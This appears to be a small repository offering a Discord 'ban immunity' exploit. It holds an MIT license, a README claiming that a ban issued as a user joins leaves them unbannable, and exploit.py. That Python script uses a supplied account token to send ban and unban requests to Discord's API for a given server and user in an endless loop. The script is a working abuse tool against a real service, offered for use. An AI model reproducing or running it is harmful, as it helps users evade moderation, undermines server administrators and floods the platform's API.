├── LICENSE ├── README.md └── exploit.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 orlando 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Discord-Ban-Immunity 2 | Discord exploit allowing you to be unbannable. 9/3/2021 3 | 4 | Found in late August. 5 | Found by [Passive](https://github.com/Passive) and [Me](https://github.com/dehoisted). 6 | 7 | # Explanation 8 | If a user gets banned at the **same time** that they join a server, Discord seems to **still** think the user is banned. 9 | Hence why the user won't work, however, kicking the user from the server may work. 10 | 11 | # Proof of Concept 12 | https://user-images.githubusercontent.com/75084509/132071018-f3b3b600-a1b4-4dcc-bc3f-bfc200184352.mp4 13 | 14 | # Code 15 | The exploit is difficult to replicate code-wise, so there is no POC source yet. 16 | If you make a working POC source, then make a pull request with the source [here](https://github.com/dehoisted/Ban-Immunity). (any programming language) 17 | Or, you can contact me on telegram [here](https://t.me/Constex). 18 | -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | # Discord Unban Exploit 2 | # Author/Credits: 0x1CA3 | https://github.com/0x1CA3 3 | # Note: This can be improved. 4 | 5 | import sys 6 | import requests 7 | 8 | class Exploit: 9 | def __init__(self, token, serverid, userid) -> None: 10 | self.token = token 11 | self.serverid = serverid 12 | self.userid = userid 13 | self.headers = {"Authorization": self.token} 14 | 15 | def run(self) -> None: 16 | while True: 17 | print("\nStatus Code -> " + str(requests.put(f"https://discord.com/api/v9/guilds/{self.serverid}/bans/{self.userid}", headers=self.headers).status_code)) 18 | print(f"Banning user -> {self.userid}") 19 | print("\nStatus Code -> " + str(requests.delete(f"https://discord.com/api/v9/guilds/{self.serverid}/bans/{self.userid}", headers=self.headers).status_code)) 20 | print(f"Unbanning user -> {self.userid}") 21 | 22 | def main() -> None: 23 | if len(sys.argv) < 4: 24 | print("python3 exploit.py ") 25 | sys.exit() 26 | token = sys.argv[1] 27 | serverid = sys.argv[2] 28 | userid = sys.argv[3] 29 | Exploit(token, serverid, userid).run() 30 | 31 | if __name__ == "__main__": 32 | main() 33 | --------------------------------------------------------------------------------